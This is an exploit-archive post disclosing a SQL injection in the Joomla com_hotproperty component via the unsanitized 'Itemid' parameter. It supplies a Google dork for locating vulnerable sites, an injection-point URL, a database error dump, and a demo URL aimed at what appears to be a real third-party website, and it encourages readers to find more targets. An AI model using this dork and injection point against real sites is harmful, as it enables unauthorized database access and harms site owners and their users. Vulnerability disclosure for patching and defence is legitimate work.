Joomla com_hotproperty SQL Injection

2016.01.21
Credit: Dz MinD Injector
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

### # Title : Exploit Joomla com_hotproperty Sql Injection # Author : Dz MinD Injector # Home : Algeria 23000 d^_^b # FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector # Type : proof of concept # Tested on : Windows7 & Linux # Date : 18/01/2016 ### # <?php # echo " Freedom t0 Palastine " ; # ?> # Lov3 Explo8ting Just For Fun ! ######## [ Proof / Exploit ] ################|=> #! Google Dork : #+ inurl:com_hotproperty #########################[!] Description ################################## "Itemid=" field in com_hotproperty&task=asearch&Item id=27&search_id=2&Itemid= is not properly sanitized, that leads to SQL Injection Vulnerability. when you test vulnerability you get some think like that: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM' at line 7 SQL=CREATE TABLE jos_hp_temp (\n id INT(11) NOT NULL, \nname MEDIUMTEXT NOT NULL, \nCounty SET('Shasta County', 'Trinity County') NOT NULL, \nMLS MEDIUMTEXT NOT NULL, \nPRIMARY KEY (id)\n) TYPE=MyISAM ;Table 'mytrinit_joom1.jos_hp_temp' doesn't exist SQL=INSERT INTO jos_hp_temp (`id`, `name`) \n SELECT p.id, p.name\n FROM (jos_hp_properties AS p, jos_hp_companies AS c)\n LEFT JOIN jos_hp_prop_types AS t ON p.type = t.id\n LEFT JOIN jos_hp_agents AS a ON p.agent = a.id\n WHERE p.published='1' AND p. approved='1' AND t.published='1'\n AND a.company=c.id\n AND (publish_up = '0000-00-00 00:00:00' OR publish_up <= NOW())\n AND (publish_down = '0000-00-00 00:00:00' OR publish_down >= NOW())Table 'mytrinit_joom1.jos_hp_temp' doesn't exist SQL=DELETE FROM jos_hp_temp WHERE FIND_IN_SET('Trinity County', County) < 1 #########################[!] Proof Of Concept ################################## http://localhost/path/index.php?option=com_hotproperty&task=asearch&Item id=27&search_id=2&Itemid=[ inject Here ] ##Demo : http://mytrinityhome.com/index.php?option=com_hotproperty&task=asearch&Item%20id=27&search_id=2&Itemid=31' !+ Find More targets in Google ^_^ !+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top